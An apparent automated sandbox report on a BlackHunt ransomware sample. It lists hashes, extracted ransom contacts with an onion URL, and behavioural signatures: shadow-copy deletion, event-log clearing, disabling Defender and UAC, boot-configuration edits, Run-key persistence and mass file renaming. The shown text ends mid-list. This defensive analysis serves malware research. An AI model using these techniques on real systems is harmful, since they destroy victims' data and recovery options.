Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
120s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
18/01/2024, 22:52 UTC
Static task
static1
Behavioral task
behavioral1
Sample
2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe
Resource
win10v2004-20231222-en
General
-
Target
2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe
-
Size
707KB
-
MD5
8f1b4a1ad35803c3e7306790ac78dadf
-
SHA1
559111015958073f9f462b82fbc1a44cdb420441
-
SHA256
2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87
-
SHA512
b2199fa282ad6740f3e981e6c3b92fef7bd834ac6fb42134dd7953038aee2faea72c3efdf4684e1fb2ab2c6755942ed782ca0748ef860a895390c328da8f6c07
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1j8Wvnh:6uaTmkZJ+naie5OTamgEoKxLWCoh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
w4ifO5uDw@gmail.com
Teikobest@gmail.com
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 2280 fsutil.exe 3412 fsutil.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 2620 wevtutil.exe 3632 wevtutil.exe 3776 wevtutil.exe 3560 wevtutil.exe 3680 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 1968 bcdedit.exe 1444 bcdedit.exe 3564 bcdedit.exe 4072 bcdedit.exe -
Renames multiple (2842) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2088 wbadmin.exe 3888 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 3872 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Q: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened (read-only) \??\T: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened (read-only) \??\Y: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened (read-only) \??\A: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened (read-only) \??\S: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened (read-only) \??\G: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened (read-only) \??\J: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened (read-only) \??\F: conhost.exe File opened (read-only) \??\L: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened (read-only) \??\U: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened (read-only) \??\O: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened (read-only) \??\P: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened (read-only) \??\Z: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened (read-only) \??\V: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened (read-only) \??\B: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened (read-only) \??\M: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\W: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened (read-only) \??\E: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened (read-only) \??\R: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened (read-only) \??\I: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened (read-only) \??\H: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened (read-only) \??\K: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened (read-only) \??\X: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened (read-only) \??\N: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: fsutil.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\circleround_glass.png 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-uihandler.xml 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Dublin 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\02_frenchtv.luac 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\#BlackHunt_Private.key 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.actionProvider.exsd 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Rio_Gallegos 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files\VideoLAN\VLC\locale\el\#BlackHunt_ReadMe.txt 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+10 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\#BlackHunt_ReadMe.txt 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_it.properties 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\#BlackHunt_Private.key 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\00_musicbrainz.luac 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_MoveNoDrop32x32.gif 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-enumerations.xml 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kuala_Lumpur 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files\VideoLAN\VLC\lua\http\requests\#BlackHunt_Private.key 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\7-Zip\Lang\an.txt 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-profiling.xml 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Lima 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Luxembourg 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\EST5 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\#BlackHunt_ReadMe.txt 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files\VideoLAN\VLC\locale\fy\#BlackHunt_ReadMe.hta 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\#BlackHunt_ReadMe.txt 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\ParentMenuButtonIcon.png 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\#BlackHunt_Private.key 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files\Java\jre7\lib\zi\America\Indiana\#BlackHunt_Private.key 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Novosibirsk 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files\VideoLAN\VLC\lua\sd\#BlackHunt_ReadMe.hta 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\16_9-frame-highlight.png 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\scrapbook.png 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\doclib.gif 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-utilities.jar 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Circle_ButtonGraphic.png 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files\Java\jre7\lib\zi\Australia\#BlackHunt_ReadMe.hta 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-common.xml 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\#BlackHunt_Private.key 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files\DVD Maker\en-US\#BlackHunt_Private.key 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-utilities.xml 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\#BlackHunt_ReadMe.hta 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\#BlackHunt_ReadMe.hta 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Tallinn 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Eirunepe 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_ja_4.4.0.v20140623020002.jar 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-actions.jar 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\#BlackHunt_Private.key 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\DVD Maker\fieldswitch.ax 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\203x8subpicture.png 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\rightnav.gif 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\#BlackHunt_ReadMe.hta 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\dummy.luac 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files\VideoLAN\VLC\plugins\codec\#BlackHunt_Private.key 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\Data1.cab 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\#BlackHunt_ReadMe.txt 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santiago 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.nl_zh_4.4.0.v20140623020002.jar 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\#BlackHunt_Private.key 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\#BlackHunt_Private.key 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File opened for modification C:\Program Files\RestoreDisconnect.mpg 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\#BlackHunt_ReadMe.hta 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\#BlackHunt_ReadMe.txt 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\#BlackHunt_Private.key 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1336 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 904 vssadmin.exe 3992 vssadmin.exe 1172 vssadmin.exe 2708 vssadmin.exe 2016 vssadmin.exe 2388 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 3772 taskkill.exe -
Modifies registry class 10 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3688 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1768 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe Token: SeRestorePrivilege 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe Token: SeBackupPrivilege 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe Token: SeTakeOwnershipPrivilege 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe Token: SeAuditPrivilege 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe Token: SeSecurityPrivilege 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe Token: SeIncBasePriorityPrivilege 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe Token: SeBackupPrivilege 2520 vssvc.exe Token: SeRestorePrivilege 2520 vssvc.exe Token: SeAuditPrivilege 2520 vssvc.exe Token: SeBackupPrivilege 2532 cmd.exe Token: SeRestorePrivilege 2532 cmd.exe Token: SeSecurityPrivilege 2532 cmd.exe Token: SeSecurityPrivilege 3776 wevtutil.exe Token: SeBackupPrivilege 3776 wevtutil.exe Token: SeSecurityPrivilege 2620 wevtutil.exe Token: SeBackupPrivilege 2620 wevtutil.exe Token: SeSecurityPrivilege 3632 wevtutil.exe Token: SeBackupPrivilege 3632 wevtutil.exe Token: SeSecurityPrivilege 3560 wevtutil.exe Token: SeBackupPrivilege 3560 wevtutil.exe Token: SeSecurityPrivilege 3680 wevtutil.exe Token: SeBackupPrivilege 3680 wevtutil.exe Token: SeDebugPrivilege 3772 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2252 wrote to memory of 1976 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 155 PID 2252 wrote to memory of 1976 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 155 PID 2252 wrote to memory of 1976 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 155 PID 2252 wrote to memory of 1976 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 155 PID 2252 wrote to memory of 2200 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 154 PID 2252 wrote to memory of 2200 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 154 PID 2252 wrote to memory of 2200 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 154 PID 2252 wrote to memory of 2200 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 154 PID 2252 wrote to memory of 1972 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 152 PID 2252 wrote to memory of 1972 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 152 PID 2252 wrote to memory of 1972 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 152 PID 2252 wrote to memory of 1972 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 152 PID 1976 wrote to memory of 2112 1976 cmd.exe 151 PID 1976 wrote to memory of 2112 1976 cmd.exe 151 PID 1976 wrote to memory of 2112 1976 cmd.exe 151 PID 2252 wrote to memory of 1680 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 49 PID 2252 wrote to memory of 1680 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 49 PID 2252 wrote to memory of 1680 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 49 PID 2252 wrote to memory of 1680 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 49 PID 2252 wrote to memory of 2608 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 149 PID 2252 wrote to memory of 2608 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 149 PID 2252 wrote to memory of 2608 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 149 PID 2252 wrote to memory of 2608 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 149 PID 2200 wrote to memory of 2720 2200 cmd.exe 147 PID 2200 wrote to memory of 2720 2200 cmd.exe 147 PID 2200 wrote to memory of 2720 2200 cmd.exe 147 PID 2252 wrote to memory of 2736 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 31 PID 2252 wrote to memory of 2736 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 31 PID 2252 wrote to memory of 2736 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 31 PID 2252 wrote to memory of 2736 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 31 PID 1972 wrote to memory of 2636 1972 cmd.exe 145 PID 1972 wrote to memory of 2636 1972 cmd.exe 145 PID 1972 wrote to memory of 2636 1972 cmd.exe 145 PID 2252 wrote to memory of 2604 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 144 PID 2252 wrote to memory of 2604 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 144 PID 2252 wrote to memory of 2604 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 144 PID 2252 wrote to memory of 2604 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 144 PID 1680 wrote to memory of 2880 1680 reg.exe 216 PID 1680 wrote to memory of 2880 1680 reg.exe 216 PID 1680 wrote to memory of 2880 1680 reg.exe 216 PID 2252 wrote to memory of 2768 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 142 PID 2252 wrote to memory of 2768 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 142 PID 2252 wrote to memory of 2768 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 142 PID 2252 wrote to memory of 2768 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 142 PID 2252 wrote to memory of 2612 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 32 PID 2252 wrote to memory of 2612 2252 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 32 PID 2252 wrote to memory of 2612 2252 